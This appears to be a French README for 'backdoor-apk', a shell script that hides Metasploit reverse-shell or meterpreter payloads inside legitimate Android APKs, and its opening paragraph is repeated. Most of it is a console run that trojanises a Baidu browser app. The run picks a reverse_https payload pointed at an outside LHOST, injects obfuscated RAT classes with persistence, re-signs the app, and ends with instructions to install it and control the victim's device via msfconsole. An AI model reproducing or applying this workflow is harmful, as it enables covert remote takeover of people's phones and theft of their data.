
backdoor-apk est un script shell qui simplifie le processus d'ajout d'une porte dérobée à n'importe quel fichier APK Android. Les utilisateurs de ce script shell doivent avoir une connaissance pratique de Linux, Bash, Metasploit, Apktool, du SDK Android, de smali, etc. Ce script shell est fourni tel quel, sans garantie d'aucune sorte, et est destiné uniquement à des fins éducatives.
backdoor-apk est un script shell qui simplifie le processus d'ajout d'une backdoor à n'importe quel fichier APK Android. Les utilisateurs de ce script shell doivent avoir une connaissance pratique de Linux, Bash, Metasploit, Apktool, le SDK Android, smali, etc. Ce script shell est fourni tel quel, sans aucune garantie, et est destiné uniquement à des fins éducatives.
Utilisation :
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Lancement de backdoor-apk.sh v0.2.4a le Fri Sep 28 17:13:37 EDT 2018
[+] Options de payload Android :
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Veuillez sélectionner une option de payload Android : 2
[?] Veuillez entrer une valeur LHOST : 10.6.9.31
[?] Veuillez entrer une valeur LPORT : 443
[+] Options de permission du manifeste Android :
1) Conserver l'original
2) Fusionner avec le payload et mélanger
[?] Veuillez sélectionner une option de permission du manifeste Android : 2
[+] Gérer le payload via un script de ressources : msfconsole -r backdoor-apk.rc
[*] Décompilation du fichier APK original...fait.
[*] Localisation du fichier smali à accrocher dans le projet original...fait.
[+] Paquet où les fichiers smali RAT seront injectés : com/baidu/browser/inter
[+] Fichier smali pour accrocher le payload RAT : com/baidu/browser/inter/BdApplication.smali
[*] Génération du fichier APK RAT...fait.
[*] Décompilation du fichier APK RAT...fait.
[*] Fusion des permissions des projets original et payload...fait.
[*] Injection des classes Java utiles dans le fichier APK RAT...fait.
[*] Création d'un nouveau répertoire dans le paquet original pour les fichiers smali RAT...fait.
[+] Chemin d'injection du paquet : com/baidu/browser/inter/pjese
[+] Nouveau nom de classe smali généré pour MainBroadcastReceiver.smali : Iivym
[+] Nouveau nom de classe smali généré pour MainService.smali : Aupyx
[+] Nouveau nom de classe smali généré pour Payload.smali : Nwiuc
[+] Nouveau nom de classe smali généré pour StringObfuscator.smali : Abnrw
[+] Nouveau nom de méthode smali généré pour la méthode StringObfuscator.obfuscate : icobf
[+] Nouveau nom de méthode smali généré pour la méthode StringObfuscator.unobfuscate : wbcik
[*] Copie des fichiers smali RAT vers les nouveaux répertoires dans le projet original...fait.
[*] Correction des fichiers smali RAT...fait.
[*] Obfuscation des valeurs const-string dans les fichiers smali RAT...fait.
[*] Ajout du crochet dans le fichier smali original...fait.
[*] Ajout du crochet de persistance dans le projet original...fait.
[*] Recompilation du projet original avec la backdoor...fait.
[*] Génération de la clé RSA pour la signature...fait.
[*] Signature de l'APK recompilé...fait.
[*] Vérification des artefacts signés...fait.
[*] Alignement de l'APK recompilé...fait.
root@kali:~/Code/github/backdoor-apk/backdoor-apk#
L'APK recompilé sera trouvé dans le répertoire 'original/dist'. Installez l'APK sur un appareil Android compatible, exécutez-le, et gérez la connexion meterpreter via le script de ressources généré : msfconsole -r backdoor-apk.rc